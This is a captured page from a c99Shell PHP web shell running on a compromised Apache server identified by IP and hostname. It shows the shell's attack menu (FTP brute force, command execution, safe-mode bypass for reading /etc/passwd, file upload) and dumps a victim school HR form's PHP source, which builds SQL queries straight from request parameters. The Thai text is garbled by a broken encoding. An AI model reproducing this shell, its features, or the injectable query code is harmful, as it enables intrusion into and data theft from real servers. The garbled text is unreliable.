110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/Dev/ drwxr-xr-x Free 52.6 GB of 127.8 GB (41.16%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/Dev/ drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: FrmpersonalDev.php (22.51 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

";
		echo "

ЎГШіТ·УЎТГ Login ЎиН№
";
		echo "";
		exit();
	} 
	else {
		/**  Configuration  */
		require_once( "../configuration.php" );
		require_once( $_Config_absolute_path . "/includes/framework.php" );
		require_once( "../includes/Function.php" );
	
		/**  Create Database Object  */
		$dbObj = new DBConn;

		//=== SESSION
		$Username = $valid_user; 
		
		
		/**  Config Table for This Page  */
		$myTable1 = "personal_tb";
		
		/**  Table  -->  personal_tb  */
		//$query = " SELECT * FROM $myTable1 WHERE Teacher_code = '$Teacher_code'";
		//$result = $dbObj->execQuery($query);
		//$rs = $dbObj->fetchArray($result);
		//$Teacher_code = $rs['Teacher_code'];

        $query = " SELECT * FROM dev_hrperson WHERE Teacher_code = '".$_REQUEST["Teacher_code"]."' OR perid = '".$_REQUEST["perid"]."'" ;
		$result = $dbObj->execQuery($query);
		$numrow = mysql_num_rows($result);

		if($numrow){			
			$isDev = true;
			$query = "SELECT * FROM dev_hrperson as hr LEFT JOIN dev_adlinepos ON hr.poscode = dev_adlinepos.adlineId WHERE perid = '".$_REQUEST["perid"]."'";
		}
		else{
			$isDev = false;
			$query = " SELECT * FROM $myTable1 WHERE Teacher_code = '".$_REQUEST["Teacher_code"]."'";
		}

		$result = $dbObj->execQuery($query);
		$rs = $dbObj->fetchArray($result);
		
	} # else
 ?>








ўйНБЩЕ»ГРЗСµФКиЗ№µСЗ - бЎйдўўйНБЩЕ»ГРЗСµФКиЗ№µСЗ





  
    
    
     ">
        ">
        
      
      
        
      
      
			
				Л№йТЛЕСЎ »
				">ўйНБЩЕєШ¤¤Е »
			
			бЎйдўўйНБЩЕєШ¤ЕТЎГ
		
      
	  
		Л№йТЛЕСЎ »
		бЎйдўўйНБЩЕєШ¤ЕТЎГ аѕЧиНєС№·ЦЎЕ§г№°Т№ўйНБЩЕєШ¤ЕТЎГ
      
      
         
      
      
         ‹ ВйН№ЎЕСє
      
      
        
              
                ">
                    
                  
                    аЕў·ХиєСµГ»ГРЄТЄ№
                    :
                    
						" size="15" maxlength="17" onkeypress="return (NumOnly(event) && changeFormatPin(this,event));"/>  
					
                  
                  
                    ЄЧиН-№ТБКЎШЕ
                    :
                    
                      
                        
                          " size="15" style="text-align:left" /> 
                          " size="15" style="text-align:left" /> 
						
                      
                    
                  
				  
                    аѕИ
                    :
                    
						 value="1" /> ЄТВ
						 value="2" /> ЛФ§
					
                  
                  
                    ЗС№аЎФґ
                    :
                     
						
                    
                  
				  
                    ЗС№·ХиєГГЁШ
                    :
                    
						
                    
                  
                  
                    ЗС№·Хи»ЇФєСµФ§Т№
                    :
                    
						
                    
                  
                  
                    К¶Т№АТѕЎТГ»ЇФєСµФ§Т№
                    :
                    
                      
                    
                  
                  
                    К¶Т№РЎТГ»ЇФєСµФ§Т№
                    :
                    
                      
                    
                  
                  
                    µУбЛ№и§аЕў·Хи
                    :
                    
                  
                  
                    µУбЛ№и§
                    :
                    
                      
                      
                      
					
                  
                  
                    ГРґСє
                    :
                    
                      
                    
                  
                  
                    а§Ф№аґЧН№
                    :
                    " size="10" />
                  
                  
                    гє»ГРЎНєвГ¤ИФЕ»Р
                    :
                    
                      
                    КАТЗФЄТЄХѕаЕў·Хи 
                    
                  
                  
                    ЕСЎЙіРўН§µУбЛ№и§
                    :
                     value="1" />
ГРґСєјЩйєГФЛТГ
   value="2" />
ЛСЗЛ№йТЅиТВ/ЛСЗЛ№йТ§Т№ 
 value="3" />
ГРґСє»ЇФєСµФ§Т№
                  
                  
                    Л№иЗВ§Т№µТБ Ё.
                    :
                    
					execQuery($query2);
		                  $rs2 = $dbObj->fetchArray($result2);
					;?>
                      
                      
                      
                  
                  
                    Л№иЗВ§Т№·Хи»ЇФєСµФ§Т№ЁГФ§
                    :
                    execQuery($query2);
		                  $rs2 = $dbObj->fetchArray($result2); ?>
                          
                      
                                            
                      
                  
                  
                    ЎЕШиБ§Т№/ЅиТВ/Л№иЗВ
                    :
                    
                      
                      
                  
                  
                    КСТЎТГгЄй·Ш№
                    :
                     value="Y" onclick="document.getElementById('schDisplay').style.display=''"/> 
                      НВЩиГРЛЗиТ§ЎТГгЄй·Ш№ 
                       value="N" onclick="document.getElementById('schDisplay').style.display='none'"/>
                      ЛБґГРВРаЗЕТЎТГгЄй·Ш№бЕйЗ
                  
                  НВЩиГРЛЗиТ§
                    :
                    
						
							
								ЗС№·Хи
								
								КФй№КШґ ЗС№·Хи : 
								
							
											
					
                  
                  
                     
                  
                  
                     
                     
                    
                      
                       
                      
                  
             	
                
                  
                    " width="150" height="170" />
                  
                
              
            
      
      
         
      
    
   
  




freeresult($result1);
	
	/**  Close the Database  */
	$dbObj->disconn();
	
	/**  Unset Class  */
	unset($dbObj);
?>
bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--